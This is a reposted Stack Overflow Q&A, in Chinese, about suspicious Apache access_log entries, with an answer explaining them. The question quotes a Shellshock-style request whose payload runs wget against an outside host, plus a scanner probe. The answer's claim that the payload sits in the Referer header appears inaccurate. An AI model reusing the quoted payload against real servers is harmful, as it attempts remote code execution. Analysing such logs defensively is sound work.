gpt4 book ai didi

linux - 在 apache access_log 文件中发现错误

转载 作者:太空宇宙 更新时间:2023-11-04 05:26:51 27 4
gpt4 key购买 nike

我在 access_log 文件中发现以下错误。我的服务器是否被黑客入侵,因为我不知道为什么该 IP 地址和日志会出现在我的服务器上:

GET /cgi-bin/test.sh HTTP/1.1" 404 292 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate 

GET /w00tw00t.at.ISC.SANS.DFind:)

最佳答案

您可能没有被黑客攻击。但最好检查您的服务器是否有任何黑客企图的迹象(root 和非 root,例如 webroot 中修改的文件)。

在第一行中,他们尝试访问您的服务器上可能不存在的文件 /cgi-bin/test.sh (http 错误代码 404,当找不到文件时,apache 本身可能会返回该文件;或者 cgi 脚本也可能会返回该文件,但我对此表示怀疑)。

该行的其余部分(包括 wget)是 Referer http header 。我不知道为什么要把漏洞代码放在那里的确切原因,但它可以通过例如编写错误的日志文件分析器来执行。这也是垃圾邮件发送者在其网站上放置链接的原因。在这里,Referer header 的内容似乎应该是脚本本身的输入,但由于某种原因不是。

关于linux - 在 apache access_log 文件中发现错误,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29897512/

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com